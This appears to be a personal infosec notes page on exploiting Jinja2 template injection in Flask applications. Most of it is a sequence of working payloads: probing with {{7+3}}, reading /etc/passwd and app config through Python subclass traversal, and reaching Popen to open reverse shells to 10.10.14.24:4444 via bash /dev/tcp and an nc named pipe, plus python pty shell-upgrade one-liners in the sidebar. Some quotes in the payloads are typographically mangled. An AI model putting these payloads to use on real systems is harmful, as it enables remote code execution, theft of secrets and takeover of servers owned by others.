akde/infosec

Information security is ultimately about managing risk


Check with {{ 7+3 }} if this is exe­cut­ed, if a Python inter­preter is using the tem­plate jin­ja engine.

{{ 7+3 }}
{{[].__class__.__base__.__subclasses__().pop(40)('etc/passwd').read() }}
{{ request.environ[‘werkzeug.server.shutdown’]() }} // ...

{{ config.items() }} // Read all config variables
{{ config|pprint }}

Exam­ple:

  1. Exe­cute the fol­low­ing to get an array of avail­able class­es.
    {{ ''.__class__.__mro__[1].__subclasses__() }}

    This returns some­thing like this.


    [<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, ...

  2. Look if this includes Popen. If yes, note the index.
    In this case, we have popen at index 407 (line 408 — 1).
  3. {{”.__class__.__mro__[1].__subclasses__()[407](“bash ‑i >& /dev/tcp/10.10.14.24/4444 0>&1”,shell=True,stdout=-1, stderr=-1).communicate()}}
  4. {{”.__class__.__mro__[1].__subclasses__()[407](“mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 10.10.14.24 4444 1>/tmp/backpipe”,shell=True,stdout=-1, stderr=-1).communicate()}}
  • https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';